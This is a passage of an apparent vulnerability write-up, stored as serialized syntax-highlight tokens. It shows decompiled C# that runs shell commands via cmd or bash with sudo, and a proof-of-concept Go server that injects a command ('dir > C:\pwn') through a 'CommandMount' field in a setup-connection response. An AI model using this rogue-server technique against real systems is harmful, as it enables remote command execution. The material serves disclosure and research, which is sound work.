1373,17615,17616],{"class":5387},"return",[1373,17618,4606],{"class":1383},[1373,17620,17621],{"class":14938}," TupleElementNames",[1373,17623,1384],{"class":1383},[1373,17625,15523],{"class":1397},[1373,17627,15757],{"class":1397},[1373,17629,7124],{"class":1383},[1373,17631,5420],{"class":1383},[1373,17633,4883],{"class":1387},[1373,17635,17636],{"class":1391},"result",[1373,17638,183],{"class":1387},[1373,17640,5437],{"class":1383},[1373,17642,4883],{"class":1387},[1373,17644,16142],{"class":1391},[1373,17646,183],{"class":1387},[1373,17648,5437],{"class":1383},[1373,17650,4883],{"class":1387},[1373,17652,17653],{"class":1391},"cmd",[1373,17655,183],{"class":1387},[1373,17657,17658],{"class":1383}," 
})]\n",[1373,17660,17661,17663,17665,17667,17670,17672,17674,17677,17679,17681,17683,17685,17687,17689,17691,17693,17695],{"class":1375,"line":1266},[1373,17662,7035],{"class":1383},[1373,17664,17616],{"class":5387},[1373,17666,4606],{"class":1383},[1373,17668,17669],{"class":14938}," Nullable",[1373,17671,1384],{"class":1383},[1373,17673,15523],{"class":1397},[1373,17675,17676],{"class":1397}," byte",[1373,17678,7124],{"class":1383},[1373,17680,5420],{"class":1383},[1373,17682,5468],{"class":5467},[1373,17684,5437],{"class":1383},[1373,17686,5557],{"class":5467},[1373,17688,5437],{"class":1383},[1373,17690,5468],{"class":5467},[1373,17692,5437],{"class":1383},[1373,17694,5468],{"class":5467},[1373,17696,17658],{"class":1383},[1373,17698,17699,17701,17703,17705,17707,17709,17712,17714,17716,17718,17720,17722,17724,17726,17728,17730,17732,17735,17737,17739,17741,17743,17745,17748,17750,17752,17754,17756,17758,17760,17762,17765,17767,17769],{"class":1375,"line":1852},[1373,17700,15019],{"class":4652},[1373,17702,15232],{"class":4652},[1373,17704,15022],{"class":4652},[1373,17706,15025],{"class":14938},[1373,17708,11852],{"class":1383},[1373,17710,17711],{"class":14938},"ValueTuple",[1373,17713,11852],{"class":1383},[1373,17715,15752],{"class":1397},[1373,17717,5437],{"class":1383},[1373,17719,16303],{"class":1397},[1373,17721,5437],{"class":1383},[1373,17723,15757],{"class":1397},[1373,17725,15038],{"class":1383},[1373,17727,16712],{"class":7297},[1373,17729,1384],{"class":1383},[1373,17731,15752],{"class":1397},[1373,17733,17734],{"class":9372}," currentDir",[1373,17736,5437],{"class":1383},[1373,17738,15757],{"class":1397},[1373,17740,16726],{"class":9372},[1373,17742,5437],{"class":1383},[1373,17744,16303],{"class":1397},[1373,17746,17747],{"class":9372}," 
sudo",[1373,17749,8575],{"class":1397},[1373,17751,16311],{"class":14985},[1373,17753,5437],{"class":1383},[1373,17755,17451],{"class":14938},[1373,17757,11852],{"class":1383},[1373,17759,15752],{"class":1397},[1373,17761,5384],{"class":1383},[1373,17763,17764],{"class":9372}," processOutputLine",[1373,17766,8575],{"class":1397},[1373,17768,15680],{"class":7054},[1373,17770,11875],{"class":1383},[1373,17772,17773],{"class":1375,"line":4692},[1373,17774,8904],{"class":1383},[1373,17776,17777,17779,17782,17784,17786,17788,17790],{"class":1375,"line":4724},[1373,17778,16322],{"class":1397},[1373,17780,17781],{"class":9372}," ranCmd",[1373,17783,8575],{"class":1397},[1373,17785,15757],{"class":1397},[1373,17787,59],{"class":1383},[1373,17789,15839],{"class":4640},[1373,17791,4912],{"class":1383},[1373,17793,17794,17796,17798,17800,17802,17804,17806,17809],{"class":1375,"line":4756},[1373,17795,4695],{"class":4636},[1373,17797,4641],{"class":1383},[1373,17799,15752],{"class":1397},[1373,17801,59],{"class":1383},[1373,17803,16609],{"class":7297},[1373,17805,1384],{"class":1383},[1373,17807,17808],{"class":4640},"currentDir",[1373,17810,16761],{"class":1383},[1373,17812,17813],{"class":1375,"line":4768},[1373,17814,9613],{"class":1383},[1373,17816,17817,17820,17822,17825,17827,17830,17832,17835],{"class":1375,"line":4792},[1373,17818,17819],{"class":4640},"        currentDir ",[1373,17821,5417],{"class":1397},[1373,17823,17824],{"class":4640}," 
AppDomain",[1373,17826,59],{"class":1383},[1373,17828,17829],{"class":4640},"CurrentDomain",[1373,17831,59],{"class":1383},[1373,17833,17834],{"class":4640},"BaseDirectory",[1373,17836,4912],{"class":1383},[1373,17838,17839],{"class":1375,"line":4798},[1373,17840,4795],{"class":1383},[1373,17842,17843,17845,17847,17850,17852,17855],{"class":1375,"line":4806},[1373,17844,4695],{"class":4636},[1373,17846,4641],{"class":1383},[1373,17848,17849],{"class":4640},"CommandLine",[1373,17851,59],{"class":1383},[1373,17853,17854],{"class":4640},"IsDocker",[1373,17856,11875],{"class":1383},[1373,17858,17859],{"class":1375,"line":4817},[1373,17860,9613],{"class":1383},[1373,17862,17863,17866,17868,17870],{"class":1375,"line":4825},[1373,17864,17865],{"class":4640},"        sudo ",[1373,17867,5417],{"class":1397},[1373,17869,16311],{"class":14985},[1373,17871,4912],{"class":1383},[1373,17873,17874],{"class":1375,"line":4835},[1373,17875,4795],{"class":1383},[1373,17877,17878,17881,17884,17886,17888],{"class":1375,"line":4843},[1373,17879,17880],{"class":14938},"    ProcessStartInfo",[1373,17882,17883],{"class":9372}," processStartInfo",[1373,17885,8575],{"class":1397},[1373,17887,15283],{"class":1397},[1373,17889,17890],{"class":14938}," ProcessStartInfo\n",[1373,17892,17893],{"class":1375,"line":4849},[1373,17894,9613],{"class":1383},[1373,17896,17897,17900,17902,17904,17907,17909,17912,17914,17916,17918,17920,17922,17924,17926,17929,17931],{"class":1375,"line":4877},[1373,17898,17899],{"class":4640},"        FileName 
",[1373,17901,5417],{"class":1397},[1373,17903,4641],{"class":1383},[1373,17905,17906],{"class":4640},"OperatingSystem",[1373,17908,59],{"class":1383},[1373,17910,17911],{"class":7297},"IsWindows",[1373,17913,7514],{"class":1383},[1373,17915,16851],{"class":1397},[1373,17917,4883],{"class":1387},[1373,17919,14509],{"class":1391},[1373,17921,183],{"class":1387},[1373,17923,16887],{"class":1397},[1373,17925,4883],{"class":1387},[1373,17927,17928],{"class":1391},"\u002Fbin\u002Fbash",[1373,17930,183],{"class":1387},[1373,17932,17933],{"class":1383},"),\n",[1373,17935,17936,17939,17941,17943,17945,17947,17949,17951,17953,17955,17957,17960,17962,17964,17966,17968,17970,17972,17974,17977,17979,17981,17983,17985,17988,17990,17992,17994,17996,17998,18000,18002,18004,18007,18009,18011,18013,18015],{"class":1375,"line":4915},[1373,17937,17938],{"class":4640},"        Arguments ",[1373,17940,5417],{"class":1397},[1373,17942,4641],{"class":1383},[1373,17944,17906],{"class":4640},[1373,17946,59],{"class":1383},[1373,17948,17911],{"class":7297},[1373,17950,7514],{"class":1383},[1373,17952,16851],{"class":1397},[1373,17954,4641],{"class":1383},[1373,17956,183],{"class":1387},[1373,17958,17959],{"class":1391},"\u002Fc ",[1373,17961,183],{"class":1387},[1373,17963,15478],{"class":1397},[1373,17965,16726],{"class":4640},[1373,17967,2230],{"class":1383},[1373,17969,16887],{"class":1397},[1373,17971,4641],{"class":1383},[1373,17973,183],{"class":1387},[1373,17975,17976],{"class":1391},"-c ",[1373,17978,17131],{"class":2326},[1373,17980,183],{"class":1387},[1373,17982,15478],{"class":1397},[1373,17984,4641],{"class":1383},[1373,17986,17987],{"class":4640},"sudo ",[1373,17989,13993],{"class":1397},[1373,17991,4883],{"class":1387},[1373,17993,17987],{"class":1391},[1373,17995,183],{"class":1387},[1373,17997,16887],{"class":1397},[1373,17999,16579],{"class":1387},[1373,18001,2230],{"class":1383},[1373,18003,15478],{"class":1397},[1373,18005,18006],{"class":4640}," command 
",[1373,18008,15448],{"class":1397},[1373,18010,4883],{"class":1387},[1373,18012,17131],{"class":2326},[1373,18014,183],{"class":1387},[1373,18016,18017],{"class":1383},")),\n",[1373,18019,18020,18023,18025,18027],{"class":1375,"line":4931},[1373,18021,18022],{"class":4640},"        RedirectStandardOutput ",[1373,18024,5417],{"class":1397},[1373,18026,14986],{"class":14985},[1373,18028,9062],{"class":1383},[1373,18030,18031,18034,18036,18038],{"class":1375,"line":4947},[1373,18032,18033],{"class":4640},"        RedirectStandardError ",[1373,18035,5417],{"class":1397},[1373,18037,14986],{"class":14985},[1373,18039,9062],{"class":1383},[1373,18041,18042,18045,18047,18049],{"class":1375,"line":4952},[1373,18043,18044],{"class":4640},"        UseShellExecute ",[1373,18046,5417],{"class":1397},[1373,18048,16311],{"class":14985},[1373,18050,9062],{"class":1383},[1373,18052,18053,18056,18058,18060],{"class":1375,"line":6776},[1373,18054,18055],{"class":4640},"        CreateNoWindow ",[1373,18057,5417],{"class":1397},[1373,18059,14986],{"class":14985},[1373,18061,9062],{"class":1383},[1373,18063,18064,18067,18069],{"class":1375,"line":6781},[1373,18065,18066],{"class":4640},"        WorkingDirectory ",[1373,18068,5417],{"class":1397},[1373,18070,18071],{"class":4640}," currentDir\n",[1373,18073,18074],{"class":1375,"line":7524},[1373,18075,18076],{"class":1383},"    };\n",[1373,18078,18079,18082,18084,18086,18088,18091,18093,18095,18097,18099,18101,18103,18106],{"class":1375,"line":7530},[1373,18080,18081],{"class":4640},"    ranCmd ",[1373,18083,5417],{"class":1397},[1373,18085,17883],{"class":4640},[1373,18087,59],{"class":1383},[1373,18089,18090],{"class":4640},"FileName 
",[1373,18092,15448],{"class":1397},[1373,18094,4883],{"class":1387},[1373,18096,4883],{"class":1387},[1373,18098,15478],{"class":1397},[1373,18100,17883],{"class":4640},[1373,18102,59],{"class":1383},[1373,18104,18105],{"class":4640},"Arguments",[1373,18107,4912],{"class":1383},[1373,18109,18110,18113,18116,18118,18120,18123],{"class":1375,"line":7546},[1373,18111,18112],{"class":14938},"    StringBuilder",[1373,18114,18115],{"class":9372}," resultSb",[1373,18117,8575],{"class":1397},[1373,18119,15283],{"class":1397},[1373,18121,18122],{"class":14938}," StringBuilder",[1373,18124,15603],{"class":1383},[1373,18126,18127,18130,18133,18135,18137],{"class":1375,"line":7571},[1373,18128,18129],{"class":1397},"    bool",[1373,18131,18132],{"class":9372}," flag",[1373,18134,8575],{"class":1397},[1373,18136,16311],{"class":14985},[1373,18138,4912],{"class":1383},[1373,18140,18141,18143,18145,18147,18150,18152,18154],{"class":1375,"line":7598},[1373,18142,15270],{"class":4636},[1373,18144,4641],{"class":1383},[1373,18146,17590],{"class":14938},[1373,18148,18149],{"class":9372}," process",[1373,18151,8575],{"class":1397},[1373,18153,15283],{"class":1397},[1373,18155,18156],{"class":14938}," Process\n",[1373,18158,18159],{"class":1375,"line":7615},[1373,18160,9613],{"class":1383},[1373,18162,18163,18166,18168],{"class":1375,"line":7635},[1373,18164,18165],{"class":4640},"        StartInfo ",[1373,18167,5417],{"class":1397},[1373,18169,18170],{"class":4640}," processStartInfo\n",[1373,18172,18173],{"class":1375,"line":7640},[1373,18174,18175],{"class":1383},"    })\n",[1373,18177,18178],{"class":1375,"line":7648},[1373,18179,9613],{"class":1383},[1373,18181,18182,18185,18187,18190,18193,18197,18199,18201,18204,18206,18209,18212],{"class":1375,"line":7672},[1373,18183,18184],{"class":4640},"        process",[1373,18186,59],{"class":1383},[1373,18188,18189],{"class":4640},"OutputDataReceived ",[1373,18191,18192],{"class":1397},"+=",[1373,18194,18196],{"class":18195},"sQHqT"," 
delegate",[1373,18198,1384],{"class":1383},[1373,18200,13374],{"class":1397},[1373,18202,18203],{"class":9372}," sender",[1373,18205,5437],{"class":1383},[1373,18207,18208],{"class":14938}," DataReceivedEventArgs",[1373,18210,18211],{"class":9372}," args",[1373,18213,11875],{"class":1383},[1373,18215,18216],{"class":1375,"line":7688},[1373,18217,9788],{"class":1383},[1373,18219,18220,18222,18224,18226,18228,18230,18233,18235,18238,18240,18243],{"class":1375,"line":7709},[1373,18221,9793],{"class":4636},[1373,18223,4641],{"class":1383},[1373,18225,16090],{"class":1397},[1373,18227,15752],{"class":1397},[1373,18229,59],{"class":1383},[1373,18231,18232],{"class":7297},"IsNullOrEmpty",[1373,18234,1384],{"class":1383},[1373,18236,18237],{"class":4640},"args",[1373,18239,59],{"class":1383},[1373,18241,18242],{"class":4640},"Data",[1373,18244,16761],{"class":1383},[1373,18246,18247],{"class":1375,"line":7714},[1373,18248,9814],{"class":1383},[1373,18250,18251,18254,18256,18259,18261,18263,18265,18267],{"class":1375,"line":7722},[1373,18252,18253],{"class":4640},"                resultSb",[1373,18255,59],{"class":1383},[1373,18257,18258],{"class":7297},"AppendLine",[1373,18260,1384],{"class":1383},[1373,18262,18237],{"class":4640},[1373,18264,59],{"class":1383},[1373,18266,18242],{"class":4640},[1373,18268,4680],{"class":1383},[1373,18270,18271,18274,18276,18278,18280,18283,18285,18287],{"class":1375,"line":9903},[1373,18272,18273],{"class":14938},"                Action",[1373,18275,11852],{"class":1383},[1373,18277,15752],{"class":1397},[1373,18279,5384],{"class":1383},[1373,18281,18282],{"class":9372}," processOutputLine5",[1373,18284,8575],{"class":1397},[1373,18286,17764],{"class":4640},[1373,18288,4912],{"class":1383},[1373,18290,18291,18294,18296,18299,18301,18303],{"class":1375,"line":9908},[1373,18292,18293],{"class":4636},"                if",[1373,18295,4641],{"class":1383},[1373,18297,18298],{"class":4640},"processOutputLine5 
",[1373,18300,15920],{"class":1397},[1373,18302,15680],{"class":7054},[1373,18304,11875],{"class":1383},[1373,18306,18307],{"class":1375,"line":9913},[1373,18308,15802],{"class":1383},[1373,18310,18311,18314],{"class":1375,"line":9932},[1373,18312,18313],{"class":4636},"                    return",[1373,18315,4912],{"class":1383},[1373,18317,18318],{"class":1375,"line":9937},[1373,18319,18320],{"class":1383},"                }\n",[1373,18322,18323,18326,18328,18330,18332,18334],{"class":1375,"line":9957},[1373,18324,18325],{"class":7297},"                processOutputLine5",[1373,18327,1384],{"class":1383},[1373,18329,18237],{"class":4640},[1373,18331,59],{"class":1383},[1373,18333,18242],{"class":4640},[1373,18335,4680],{"class":1383},[1373,18337,18338],{"class":1375,"line":9962},[1373,18339,9832],{"class":1383},[1373,18341,18342],{"class":1375,"line":15955},[1373,18343,18344],{"class":1383},"        };\n",[1373,18346,18347,18349,18351,18354,18356,18358,18360,18362,18364,18366,18368,18370],{"class":1375,"line":16030},[1373,18348,18184],{"class":4640},[1373,18350,59],{"class":1383},[1373,18352,18353],{"class":4640},"ErrorDataReceived 
",[1373,18355,18192],{"class":1397},[1373,18357,18196],{"class":18195},[1373,18359,1384],{"class":1383},[1373,18361,13374],{"class":1397},[1373,18363,18203],{"class":9372},[1373,18365,5437],{"class":1383},[1373,18367,18208],{"class":14938},[1373,18369,18211],{"class":9372},[1373,18371,11875],{"class":1383},[1373,18373,18374],{"class":1375,"line":16035},[1373,18375,9788],{"class":1383},[1373,18377,18378,18380,18382,18384,18386,18388,18390,18392,18394,18396,18398],{"class":1375,"line":16083},[1373,18379,9793],{"class":4636},[1373,18381,4641],{"class":1383},[1373,18383,16090],{"class":1397},[1373,18385,15752],{"class":1397},[1373,18387,59],{"class":1383},[1373,18389,18232],{"class":7297},[1373,18391,1384],{"class":1383},[1373,18393,18237],{"class":4640},[1373,18395,59],{"class":1383},[1373,18397,18242],{"class":4640},[1373,18399,16761],{"class":1383},[1373,18401,18402],{"class":1375,"line":16098},[1373,18403,9814],{"class":1383},[1373,18405,18406,18408,18410,18412,18414,18416,18418,18420],{"class":1375,"line":16103},[1373,18407,18253],{"class":4640},[1373,18409,59],{"class":1383},[1373,18411,18258],{"class":7297},[1373,18413,1384],{"class":1383},[1373,18415,18237],{"class":4640},[1373,18417,59],{"class":1383},[1373,18419,18242],{"class":4640},[1373,18421,4680],{"class":1383},[1373,18423,18424,18426,18428,18430,18432,18435,18437,18439],{"class":1375,"line":16147},[1373,18425,18273],{"class":14938},[1373,18427,11852],{"class":1383},[1373,18429,15752],{"class":1397},[1373,18431,5384],{"class":1383},[1373,18433,18434],{"class":9372}," processOutputLine6",[1373,18436,8575],{"class":1397},[1373,18438,17764],{"class":4640},[1373,18440,4912],{"class":1383},[1373,18442,18443,18445,18447,18450,18452,18454],{"class":1375,"line":16153},[1373,18444,18293],{"class":4636},[1373,18446,4641],{"class":1383},[1373,18448,18449],{"class":4640},"processOutputLine6 
",[1373,18451,15920],{"class":1397},[1373,18453,15680],{"class":7054},[1373,18455,11875],{"class":1383},[1373,18457,18458],{"class":1375,"line":16164},[1373,18459,15802],{"class":1383},[1373,18461,18462,18464],{"class":1375,"line":16170},[1373,18463,18313],{"class":4636},[1373,18465,4912],{"class":1383},[1373,18467,18468],{"class":1375,"line":16187},[1373,18469,18320],{"class":1383},[1373,18471,18472,18475,18477,18479,18481,18483],{"class":1375,"line":16198},[1373,18473,18474],{"class":7297},"                processOutputLine6",[1373,18476,1384],{"class":1383},[1373,18478,18237],{"class":4640},[1373,18480,59],{"class":1383},[1373,18482,18242],{"class":4640},[1373,18484,4680],{"class":1383},[1373,18486,18487],{"class":1375,"line":16204},[1373,18488,9832],{"class":1383},[1373,18490,18491],{"class":1375,"line":16210},[1373,18492,18344],{"class":1383},[1373,18494,18495],{"class":1375,"line":16254},[1373,18496,15297],{"class":4636},[1373,18498,18500],{"class":1375,"line":18499},60,[1373,18501,9788],{"class":1383},[1373,18503,18505,18508,18510,18513],{"class":1375,"line":18504},61,[1373,18506,18507],{"class":4640},"            process",[1373,18509,59],{"class":1383},[1373,18511,18512],{"class":7297},"Start",[1373,18514,15603],{"class":1383},[1373,18516,18518,18520,18522,18525],{"class":1375,"line":18517},62,[1373,18519,18507],{"class":4640},[1373,18521,59],{"class":1383},[1373,18523,18524],{"class":7297},"BeginOutputReadLine",[1373,18526,15603],{"class":1383},[1373,18528,18530,18532,18534,18537],{"class":1375,"line":18529},63,[1373,18531,18507],{"class":4640},[1373,18533,59],{"class":1383},[1373,18535,18536],{"class":7297},"BeginErrorReadLine",[1373,18538,15603],{"class":1383},[1373,18540,18542,18545,18547,18549,18551,18554,18556,18558],{"class":1375,"line":18541},64,[1373,18543,18544],{"class":14938},"            Action",[1373,18546,11852],{"class":1383},[1373,18548,15752],{"class":1397},[1373,18550,5384],{"class":1383},[1373,18552,18553],{"class":9372}," 
processOutputLine2",[1373,18555,8575],{"class":1397},[1373,18557,17764],{"class":4640},[1373,18559,4912],{"class":1383},[1373,18561,18563,18565,18567,18570,18572,18574],{"class":1375,"line":18562},65,[1373,18564,9793],{"class":4636},[1373,18566,4641],{"class":1383},[1373,18568,18569],{"class":4640},"processOutputLine2 ",[1373,18571,15677],{"class":1397},[1373,18573,15680],{"class":7054},[1373,18575,11875],{"class":1383},[1373,18577,18579],{"class":1375,"line":18578},66,[1373,18580,9814],{"class":1383},[1373,18582,18584,18587,18589,18591,18594,18596],{"class":1375,"line":18583},67,[1373,18585,18586],{"class":7297},"                processOutputLine2",[1373,18588,1384],{"class":1383},[1373,18590,183],{"class":1387},[1373,18592,18593],{"class":1391},"Waiting for process to exit.",[1373,18595,183],{"class":1387},[1373,18597,4680],{"class":1383},[1373,18599,18601],{"class":1375,"line":18600},68,[1373,18602,9832],{"class":1383},[1373,18604,18606,18609,18611,18613,18616,18618,18621,18623,18626],{"class":1375,"line":18605},69,[1373,18607,18608],{"class":1397},"            await",[1373,18610,18149],{"class":4640},[1373,18612,59],{"class":1383},[1373,18614,18615],{"class":7297},"WaitForExitAsync",[1373,18617,1384],{"class":1383},[1373,18619,18620],{"class":1397},"default",[1373,18622,1384],{"class":1383},[1373,18624,18625],{"class":14938},"CancellationToken",[1373,18627,1413],{"class":1383},[1373,18629,18631,18634,18636,18638,18640,18643,18645,18647],{"class":1375,"line":18630},70,[1373,18632,18633],{"class":4640},"            flag ",[1373,18635,5417],{"class":1397},[1373,18637,18149],{"class":4640},[1373,18639,59],{"class":1383},[1373,18641,18642],{"class":4640},"ExitCode 
",[1373,18644,15920],{"class":1397},[1373,18646,5557],{"class":5467},[1373,18648,4912],{"class":1383},[1373,18650,18652,18654,18656,18658,18660,18662,18664,18666,18668,18670],{"class":1375,"line":18651},71,[1373,18653,17157],{"class":14938},[1373,18655,17160],{"class":9372},[1373,18657,8575],{"class":1397},[1373,18659,15283],{"class":1397},[1373,18661,17167],{"class":14938},[1373,18663,1384],{"class":1383},[1373,18665,850],{"class":5467},[1373,18667,5437],{"class":1383},[1373,18669,5468],{"class":5467},[1373,18671,4680],{"class":1383},[1373,18673,18675,18677,18679,18681,18683,18685,18688,18690],{"class":1375,"line":18674},72,[1373,18676,17183],{"class":4640},[1373,18678,59],{"class":1383},[1373,18680,17203],{"class":7297},[1373,18682,1384],{"class":1383},[1373,18684,183],{"class":1387},[1373,18686,18687],{"class":1391},"Process exit code: ",[1373,18689,183],{"class":1387},[1373,18691,4680],{"class":1383},[1373,18693,18695,18697,18699,18701,18703,18706,18708,18711,18713,18716],{"class":1375,"line":18694},73,[1373,18696,17183],{"class":4640},[1373,18698,59],{"class":1383},[1373,18700,17188],{"class":7297},[1373,18702,11852],{"class":1383},[1373,18704,18705],{"class":1397},"int",[1373,18707,15660],{"class":1383},[1373,18709,18710],{"class":4640},"process",[1373,18712,59],{"class":1383},[1373,18714,18715],{"class":4640},"ExitCode",[1373,18717,4680],{"class":1383},[1373,18719,18721,18723,18725,18727,18729,18731,18733],{"class":1375,"line":18720},74,[1373,18722,15381],{"class":1397},[1373,18724,15384],{"class":9372},[1373,18726,8575],{"class":1397},[1373,18728,17160],{"class":4640},[1373,18730,59],{"class":1383},[1373,18732,17329],{"class":7297},[1373,18734,15603],{"class":1383},[1373,18736,18738,18740,18742,18744,18746,18749,18751,18753],{"class":1375,"line":18737},75,[1373,18739,18544],{"class":14938},[1373,18741,11852],{"class":1383},[1373,18743,15752],{"class":1397},[1373,18745,5384],{"class":1383},[1373,18747,18748],{"class":9372}," 
processOutputLine3",[1373,18750,8575],{"class":1397},[1373,18752,17764],{"class":4640},[1373,18754,4912],{"class":1383},[1373,18756,18758,18760,18762,18765,18767,18769],{"class":1375,"line":18757},76,[1373,18759,9793],{"class":4636},[1373,18761,4641],{"class":1383},[1373,18763,18764],{"class":4640},"processOutputLine3 ",[1373,18766,15677],{"class":1397},[1373,18768,15680],{"class":7054},[1373,18770,11875],{"class":1383},[1373,18772,18774],{"class":1375,"line":18773},77,[1373,18775,9814],{"class":1383},[1373,18777,18779,18782,18784,18786],{"class":1375,"line":18778},78,[1373,18780,18781],{"class":7297},"                processOutputLine3",[1373,18783,1384],{"class":1383},[1373,18785,1359],{"class":4640},[1373,18787,4680],{"class":1383},[1373,18789,18791],{"class":1375,"line":18790},79,[1373,18792,9832],{"class":1383},[1373,18794,18796,18799,18801,18803,18806,18808,18810,18812],{"class":1375,"line":18795},80,[1373,18797,18798],{"class":4640},"            text ",[1373,18800,5417],{"class":1397},[1373,18802,4883],{"class":1387},[1373,18804,18805],{"class":1391},"Process Command: ",[1373,18807,183],{"class":1387},[1373,18809,15478],{"class":1397},[1373,18811,17781],{"class":4640},[1373,18813,4912],{"class":1383},[1373,18815,18817,18819,18821,18823,18825,18828,18830,18832],{"class":1375,"line":18816},81,[1373,18818,18544],{"class":14938},[1373,18820,11852],{"class":1383},[1373,18822,15752],{"class":1397},[1373,18824,5384],{"class":1383},[1373,18826,18827],{"class":9372}," processOutputLine4",[1373,18829,8575],{"class":1397},[1373,18831,17764],{"class":4640},[1373,18833,4912],{"class":1383},[1373,18835,18837,18839,18841,18844,18846,18848],{"class":1375,"line":18836},82,[1373,18838,9793],{"class":4636},[1373,18840,4641],{"class":1383},[1373,18842,18843],{"class":4640},"processOutputLine4 
",[1373,18845,15677],{"class":1397},[1373,18847,15680],{"class":7054},[1373,18849,11875],{"class":1383},[1373,18851,18853],{"class":1375,"line":18852},83,[1373,18854,9814],{"class":1383},[1373,18856,18858,18861,18863,18865],{"class":1375,"line":18857},84,[1373,18859,18860],{"class":7297},"                processOutputLine4",[1373,18862,1384],{"class":1383},[1373,18864,1359],{"class":4640},[1373,18866,4680],{"class":1383},[1373,18868,18870],{"class":1375,"line":18869},85,[1373,18871,9832],{"class":1383},[1373,18873,18875],{"class":1375,"line":18874},86,[1373,18876,9861],{"class":1383},[1373,18878,18880,18883,18885,18888,18890],{"class":1375,"line":18879},87,[1373,18881,18882],{"class":4636},"        catch",[1373,18884,4641],{"class":1383},[1373,18886,18887],{"class":14938},"Exception",[1373,18889,16523],{"class":9372},[1373,18891,11875],{"class":1383},[1373,18893,18895],{"class":1375,"line":18894},88,[1373,18896,9788],{"class":1383},[1373,18898,18900,18902,18904,18907,18909,18911,18913,18915,18917,18919,18921,18923,18925,18927,18930,18932,18934,18936],{"class":1375,"line":18899},89,[1373,18901,9896],{"class":4636},[1373,18903,15283],{"class":1397},[1373,18905,18906],{"class":14938}," 
ValueTuple",[1373,18908,11852],{"class":1383},[1373,18910,15752],{"class":1397},[1373,18912,5437],{"class":1383},[1373,18914,16303],{"class":1397},[1373,18916,5437],{"class":1383},[1373,18918,15757],{"class":1397},[1373,18920,15660],{"class":1383},[1373,18922,16574],{"class":4640},[1373,18924,59],{"class":1383},[1373,18926,15870],{"class":7297},[1373,18928,18929],{"class":1383},"(),",[1373,18931,16311],{"class":14985},[1373,18933,5437],{"class":1383},[1373,18935,17781],{"class":4640},[1373,18937,4680],{"class":1383},[1373,18939,18941],{"class":1375,"line":18940},90,[1373,18942,9861],{"class":1383},[1373,18944,18946],{"class":1375,"line":18945},91,[1373,18947,4795],{"class":1383},[1373,18949,18951,18954,18956,18958,18960],{"class":1375,"line":18950},92,[1373,18952,18953],{"class":14938},"    Process",[1373,18955,18149],{"class":9372},[1373,18957,8575],{"class":1397},[1373,18959,15680],{"class":7054},[1373,18961,4912],{"class":1383},[1373,18963,18965,18967,18969,18971,18973,18975,18977,18979,18981,18983,18985,18988,18990,18992,18994,18996,18998,19000],{"class":1375,"line":18964},93,[1373,18966,7340],{"class":4636},[1373,18968,15283],{"class":1397},[1373,18970,18906],{"class":14938},[1373,18972,11852],{"class":1383},[1373,18974,15752],{"class":1397},[1373,18976,5437],{"class":1383},[1373,18978,16303],{"class":1397},[1373,18980,5437],{"class":1383},[1373,18982,15757],{"class":1397},[1373,18984,15660],{"class":1383},[1373,18986,18987],{"class":4640},"resultSb",[1373,18989,59],{"class":1383},[1373,18991,15870],{"class":7297},[1373,18993,18929],{"class":1383},[1373,18995,18132],{"class":4640},[1373,18997,5437],{"class":1383},[1373,18999,17781],{"class":4640},[1373,19001,4680],{"class":1383},[1373,19003,19005],{"class":1375,"line":19004},94,[1373,19006,1855],{"class":1383},[1373,19008,19010],{"class":1375,"line":19009},95,[1373,19011,6520],{"emptyLinePlaceholder":237},[1373,19013,19015],{"class":1375,"line":19014},96,[1373,19016,1855],{"class":4640},[18,19018,19019],{},"Put
ting this all together, we can create a small Go program to handle the HTTP server component. Execution on Windows platforms can also be demonstrated with the following simplistic example and HTTP request:",[1354,19021,19025],{"className":19022,"code":19023,"language":19024,"meta":219,"style":219},"language-go shiki shiki-themes material-theme-lighter github-light github-dark monokai","package main\n\nimport (\n    \"fmt\"\n    \"log\"\n    \"net\u002Fhttp\"\n)\n\nfunc initHandler(w http.ResponseWriter, r *http.Request) {\n    fmt.Println(\"Connected\")\n    fmt.Fprint(w, `{\"ClusterID\":\"f0e12780-f462-4b51-a7db-149f1d56209c\", \"SharedSecret\":\"vulncheck\", \"TargetHubs\":{\"a\":\"b\"}, \"IsStandby\":false, \"SystemMount\":{\"Enabled\":true,\"ReadOnly\":false,\"MountPath\":\"\u002Fa\",\"CommandMount\":\"dir > C:\\\\pwn\"}, \"SystemAdminUsernames\":[\"poptart\"]}`)\n}\n\nfunc main() {\n    http.HandleFunc(\"\u002Fweb\u002Fapi\u002Fnode-management\u002Fsetup-initial-connection\", initHandler)\n    log.Fatal(http.ListenAndServe(\":8082\", nil))\n}\n","go",[886,19026,19027,19035,19039,19046,19058,19067,19076,19080,19084,19125,19146,19172,19176,19180,19191,19215,19250],{"__ignoreMap":219},[1373,19028,19029,19032],{"class":1375,"line":1376},[1373,19030,19031],{"class":1397},"package",[1373,19033,19034],{"class":14938}," main\n",[1373,19036,19037],{"class":1375,"line":220},[1373,19038,6520],{"emptyLinePlaceholder":237},[1373,19040,19041,19044],{"class":1375,"line":1266},[1373,19042,19043],{"class":4636},"import",[1373,19045,4803],{"class":1383},[1373,19047,19048,19051,19055],{"class":1375,"line":1852},[1373,19049,19050],{"class":1387},"    
\"",[1373,19052,19054],{"class":19053},"sP9PO","fmt",[1373,19056,19057],{"class":1387},"\"\n",[1373,19059,19060,19062,19065],{"class":1375,"line":4692},[1373,19061,19050],{"class":1387},[1373,19063,19064],{"class":19053},"log",[1373,19066,19057],{"class":1387},[1373,19068,19069,19071,19074],{"class":1375,"line":4724},[1373,19070,19050],{"class":1387},[1373,19072,19073],{"class":19053},"net\u002Fhttp",[1373,19075,19057],{"class":1387},[1373,19077,19078],{"class":1375,"line":4756},[1373,19079,11875],{"class":1383},[1373,19081,19082],{"class":1375,"line":4768},[1373,19083,6520],{"emptyLinePlaceholder":237},[1373,19085,19086,19089,19092,19094,19098,19101,19103,19106,19108,19111,19114,19116,19118,19121,19123],{"class":1375,"line":4792},[1373,19087,19088],{"class":1397},"func",[1373,19090,19091],{"class":7297}," initHandler",[1373,19093,1384],{"class":1383},[1373,19095,19097],{"class":19096},"sQgqH","w",[1373,19099,19100],{"class":14938}," http",[1373,19102,59],{"class":1383},[1373,19104,19105],{"class":14938},"ResponseWriter",[1373,19107,5437],{"class":1383},[1373,19109,19110],{"class":19096}," r",[1373,19112,19113],{"class":1397}," *",[1373,19115,6277],{"class":14938},[1373,19117,59],{"class":1383},[1373,19119,19120],{"class":14938},"Request",[1373,19122,2230],{"class":1383},[1373,19124,4765],{"class":1383},[1373,19126,19127,19130,19132,19135,19137,19139,19142,19144],{"class":1375,"line":4798},[1373,19128,19129],{"class":4640},"    
